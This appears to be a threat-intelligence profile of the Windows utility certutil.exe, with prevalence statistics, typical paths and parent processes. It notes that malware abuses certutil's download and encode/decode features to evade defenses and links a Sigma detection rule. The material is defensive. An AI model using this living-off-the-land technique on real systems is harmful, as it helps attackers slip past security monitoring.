555a8b4b7c5e9614e3ef7af2fafc6181aa98ad9d10ebfd845d82f33efeb7e1c7

Author: Microsoft

Source: Wild

Threat: LOLBin

Summary

Certutil.exe is a utility used to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.

EchoTrail Prevalence Score (EPS)

33.81

Rank Analysis

Host Prevalence

34.7%

Execution Rank

65,746th

Behavioral Analysis

Top Filenames

certutil.exe

100.00 %

Top Paths

C:\Windows\System32

96.58 %

Top Network Ports

443

92.68 %

Ancestry Analysis

Top GrandParents

IntelTechnologyAccessService.exe

Top Parents

Top Children

Security Analysis

Intel

Certutil.exe is normally meant to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains, according to Microsoft. However, it has been abused by malware because it has the ability to download, encode and decode. Downloading through certutil can help to circumvent detections and defenses. Encoding and decoding can help to achieve the same accomplishment. Here is an example Sigma rule to help detect misuse of certutil.exe: https://github.com/SigmaHQ/sigma/blob/0fcbce993288f993e626494a50dad15fc26c8a0c/rules/windows/process_creation/win_susp_certutil_command.yml